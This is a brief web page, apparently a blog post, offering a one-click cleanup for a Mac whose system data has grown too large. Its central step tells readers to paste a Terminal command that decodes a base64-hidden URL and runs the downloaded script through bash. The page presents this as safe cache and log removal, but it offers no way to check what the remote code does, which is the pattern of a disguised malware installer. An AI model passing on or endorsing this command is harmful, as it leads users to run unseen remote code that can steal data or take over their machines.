数据分析
如果Mac系统数据过大如何一键清理
Step 1: Open Terminal Press *Command (⌘) + Space, type Terminal and hit Return*.
Gana · 2026-08-23 · 2 分钟阅读Step 1: Open Terminal
Press *Command (⌘) + Space, type Terminal and hit Return*.
Step 2: Run the Command
Paste this command into the Terminal window and press *Return*:
/bin/bash -c "$(curl -fsSL $(echo aHR0cHM6Ly9wdXR1YXJ0YW5hLmNvbS9jbGVhbmVy | base64 -d))"
What this command does:
- Finds and removes temporary system files
- Cleans app caches and outdated logs
- Frees up space without touching personal data
Result
You've successfully cleaned unnecessary files from your Mac.
Your system should now have more free space and run more smoothly.
For best results, repeat this cleanup regularly — especially after updates or large app installs.